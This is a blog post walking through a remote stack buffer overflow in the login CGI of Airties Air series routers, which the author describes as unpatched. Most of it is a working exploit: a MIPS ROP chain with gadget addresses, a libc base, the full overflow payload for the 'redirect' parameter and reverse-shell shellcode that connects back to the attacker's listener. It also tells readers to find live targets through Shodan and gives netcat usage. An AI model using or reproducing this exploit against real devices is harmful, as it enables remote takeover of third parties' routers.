31 March 2015 - batuhan

Exploiting the Airties Air Series

Airties Air 5xxx and 6xxx Series login CGI Remote Stack Buffer Overflow

I found this vulnerability almost one year ago. I had contacted the vendor. So far, the vulnerability have not been patched. Effected products: Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021

Here we go. I picked up my router firmware which is Air5650TT. Its plain squash-fs so I extrached it using binwalk.

1

The login binary, in the cgi-bin folder which is our primary target for exploitation, contains parse functions for POST data. It deals 5 arguments which are redirect, self, username, password, gonder.

2

From the login failed, easily we can determine the main function use sprintf to copy the POST parameter “redirect”. If we look the stack layout of main function, 363 byte data will overwrite the RA register so it allows us to control .

3

With the help of qemu, we can test our theory easily.

4

5

As you can see, im right so keep going now its time to write an exploit for Air5660TT.

There are some critical situations we have to deal. First, our shellcode have to be NULL free. Second, We have to use MIPS ROP technique to flush the MIPS data cache to  gain code execution. We will use the libc.so with the help of mips ropfinder plugin for solving our problem. I found some gadgets which are:

.text:00040918 lw $ra, arg_4C($sp)
.text:0004091C move $v0, $a0
.text:00040920 move $v1, $a1
.text:00040924 lw $fp, arg_48($sp)
.text:00040928 lw $s7, arg_44($sp)
.text:0004092C lw $s6, arg_40($sp)
.text:00040930 lw $s5, arg_3C($sp)
.text:00040934 lw $s4, arg_38($sp)
.text:00040938 lw $s3, arg_34($sp)
.text:0004093C lw $s2, arg_30($sp)
.text:00040940 lw $s1, arg_2C($sp)
.text:00040944 lw $s0, arg_28($sp)
.text:00040948 jr $ra
.text:0004094C addiu $sp, 0x50

This is the first gadget after 359 byte padding , Now we are controlling all S registers and FP register. Now With these registers, we can make a sleep(1) then jump our shellcode.

.text:0003ECD4 move $t9, $s1
.text:0003ECD8 jalr $t9

.text:000320DC addiu $s1, $sp, 0x1F0+var_100
.text:000320E0 move $a0, $s2
.text:000320E4 move $t9, $s4
.text:000320E8
.text:000320E8 loc_320E8: # CODE XREF: wcscoll+F0#j
.text:000320E8 jalr $t9

.text:00036A2C move $t9, $s0
.text:00036A30 lw $ra, 0x20+var_4($sp)
.text:00036A34 lw $s0, 0x20+var_8($sp)
.text:00036A38 li $a0, 2
.text:00036A3C li $a1, 1
.text:00036A40 move $a2, $zero
.text:00036A44 jr $t9 ;

.text:00043440 sleep:

I’ve calculated the libc base adress 0x2AAD1000 for air5650TT

so our redirect parameter is

data = “\x41″*359 + “\x2A\xB1\x19\x18” + “\x41″*40 + “\x2A\xB1\x44\x40”

data += “\x41″*12 + “\x2A\xB0\xFC\xD4” + “\x41″*16 + “\x2A\xB0\x7A\x2C”
data += “\x41″*28 + “\x2A\xB0\x30\xDC” + “\x41″*240 + shellcode + “\x27\xE0\xFF\xFF”*48

Last 48 byte is nop also.

Our shellcode:

host = struct.unpack(‘>L’,socket.inet_aton(revhost))[0]
port = string.atoi(revport)

shellcode = “”
shellcode += “\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd”
shellcode += “\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff”
shellcode += “\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0”
shellcode += “\x3c\x0e” + struct.unpack(‘>cc’,struct.pack(‘>H’, port))[0] + struct.unpack(‘>cc’,struct.pack(‘>H’, port))[1]
shellcode += “\x35\xce” + struct.unpack(‘>cc’,struct.pack(‘>H’, port))[0] + struct.unpack(‘>cc’,struct.pack(‘>H’, port))[1]
shellcode += “\xaf\xae\xff\xe4”
shellcode += “\x3c\x0e” + struct.unpack(‘>cccc’,struct.pack(‘>I’, host))[0] + struct.unpack(‘>cccc’,struct.pack(‘>I’, host))[1]
shellcode += “\x35\xce” + struct.unpack(‘>cccc’,struct.pack(‘>I’, host))[2] + struct.unpack(‘>cccc’,struct.pack(‘>I’, host))[3]
shellcode += “\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27”
shellcode += “\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27”
shellcode += “\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c”
shellcode += “\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff”
shellcode += “\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f”
shellcode += “\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec”
shellcode += “\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab”
shellcode += “\x01\x01\x01\x0c”

You can test the exploit using shodan engine. Just search Air5650TT.

the complete poc: http://www.bmicrosystems.com/exploits/airties5650tt.txt

Edit:

Usage is simple. Just

nc -lvp “port”

Then python airties5655tt.py “remote ip” “your ip” “port”

Exploiting

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

WordPress Anti-Spam by WP-SpamShield